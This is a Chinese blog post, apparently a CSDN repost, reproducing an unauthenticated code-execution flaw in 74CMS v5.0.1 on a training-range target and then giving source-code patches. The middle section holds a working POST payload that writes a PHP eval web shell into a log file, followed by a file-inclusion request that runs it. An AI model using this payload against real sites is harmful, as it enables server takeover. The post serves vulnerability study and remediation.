74CMS漏洞复现

其他 2021-12-13 13:26:19 阅读次数: 0

74CMS漏洞复现

漏洞描述：

由于74CMS 某些函数存在过滤不严格，攻击者通过构造恶意请求，配合文件包含漏洞可在无需登录的情况下执行任意代码，控制服务器。

影响范围：

74CMS_v5.0.1

版本低于6.0.48

环境复现：

这里采用安鸾渗透实战平台的靶机地址

漏洞复现：

访问http://www.whalwl.site:8019/index.php?m=home&a=assign_resume_tpl 发现报错

访问 www.whalwl.site:8019/index.php?m=home&a=assign_resume_tpl

POST提交:variable=1&tpl=<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[x]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

将shell写入报错日志文件中

开始包含：

POST:variable=1&tpl=data/Runtime/Logs/Home/21_01_20.log(这个日志文件名为你该天的年月日)

成功包含

进行语句验证

蚁剑进行连接

漏洞修复：

在下面路径的169行进行修改

/Application/Common/Controller/BaseController.class.php

未修改前：

public function assign_resume_tpl($variable,$tpl){
foreach ($variable as $key => $value) {
$this->assign($key,$value);
}
return $this->fetch($tpl);

加入下面这行代码：

$view = new \Think\View;

$tpl_file = $view->parseTemplate($tpl);

if(!is_file($tpl_file)){

return false;

}

// 修改之后的代码
public function assign_resume_tpl($variable,$tpl){
foreach ($variable as $key => $value) {
$this->assign($key,$value);
} // fix 20210203
$view = new \Think\View;
$tpl_file = $view->parseTemplate($tpl);
if(!is_file($tpl_file)){
return false;
}
return $this->fetch($tpl);
}

下面路径的文件：

/ThinkPHP/Library/Think/View.class.php

View.class.php文件中106行fetch方法中修改

// 将110行

if(!is_file($templateFile)) E(L('_TEMPLATE_NOT_EXIST_').':'.$templateFile);

// 代码注释替换为

if(!is_file($templateFile)) E(L('_TEMPLATE_NOT_EXIST_'));

猜你喜欢

转载自blog.csdn.net/qq_48985780/article/details/121656199

74CMS漏洞复现

74CMS 3.0 CSRF漏洞

74CMS 3.4 反射型XSS漏洞

74CMS 3.0任意文件写入漏洞

74CMS 3.0 SQL注入漏洞后台

74CMS 3.0 存储型XSS漏洞

74cms 注入exp

CMS漏洞复现

复现熊海cms的漏洞

刷洞2---74cms注入漏洞

74CMS3.0储存型XSS漏洞代码审计

【漏洞复现】JAVA Public CMS 后台RCE漏洞

代码审计：云业cms后台注入漏洞复现

代码审计：云业cms前台注入漏洞复现

骑士CMS模版注入+文件包含getshell漏洞复现

网站内容管理系统--CMS相关漏洞复现

【漏洞复现-骑士cms-代码执行】vulfocus/骑士cms_cve_2020_35339

刷洞1--74cms3.5后台任意文件删除漏洞

漏洞复现-铭飞CMS cmscontentlist接口SQL注入（附漏洞检测脚本）

漏洞复现

DeDecms(织梦CMS) V5.7.72任意用户密码重置漏洞复现

Typecho CMS 反序列化漏洞(CVE-2018-18753)复现

复现——PHP代码审计-——飓风CMS1.10存在SQL注入漏洞

苹果CMS漏洞

Web-CMS漏洞

ssrf漏洞之——漏洞复现

CSRF漏洞之——漏洞复现

xxe漏洞之——漏洞复现

Nginx 解析漏洞漏洞复现

文件包含漏洞及漏洞复现

今日推荐

开源日报 | Chrome内置Gemini的意义不在于Gemini；中国AI追随之路的五大误区；ECharts创始人“下海”养鱼；谷歌I/O开发者大会什么都有，只是没有惊喜

微软回应中国区AI团队“打包赴美”传闻

基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个！

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

openKylin 社区生态委员会第六次会议圆满召开

阿里云正式发布通义千问 2.5

Python 3.13 发布首个 Beta：实验性自由线程模式和 JIT、改进交互式解释器

Stack Overflow 拿我的代码去训练 AI 大模型，还封了我的账号

Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作

《2024 年一季度互联网投融资运行情况》研究报告

报告：Django 仍然是 74% 开发者的首选

周排行

返回指定时间格式

fopen函数中的mode参数

Java 单例模式探讨

Flex remoteobject工作原理探讨

寻找mplayer的便捷安装方法

30天了解30种技术系列---(26)MySQL自动化运维工具Inception

关于Jboss/Tomcat/Jetty的JNDI定义123

程序减肥，strip，eu-strip 及其符号表

AsyncTask、View.post(Runnable)、ViewTreeObserver三种方式总结frame animation自动启动

Json和Bean的互相转换

每日归档

更多

2024-05-15(24)

2024-05-14(0)

2024-05-13(18)

2024-05-12(0)

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)